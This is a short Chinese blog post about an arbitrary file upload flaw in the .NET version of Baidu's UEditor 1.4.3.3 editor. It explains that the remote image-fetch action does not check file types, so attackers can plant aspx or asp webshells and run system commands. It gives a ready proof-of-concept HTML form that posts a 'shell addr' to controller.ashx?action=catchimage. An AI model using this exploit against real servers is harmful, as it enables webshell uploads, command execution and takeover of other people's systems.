UEditor1.4.3.3编辑器漏洞

百度的UEditor文本编辑器，漏洞是.net版本的，其他的php,jsp,asp版本不受此UEditor的漏洞的影响.。

.net存在任意文件上传，绕过文件格式的限制，在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断，攻击者可以上传任意文件包括脚本执行文件，包括aspx脚本木马，asp脚本木马，还可以利用该UEditor漏洞对服务器进行攻击，执行系统命名破坏服务器

版本为1.4.3.3版本

poc：

<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]"/></p>
<input type="submit" value="submit"/>
</form>

地址：https://www.cnblogs.com/Ivan1ee/p/10198866.html

https://blog.csdn.net/websinesafe/article/details/82215320

posted @ 2020-06-07 18:52 admin刍狗阅读(6569) 评论(1) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

admin刍狗

UEditor1.4.3.3编辑器漏洞

公告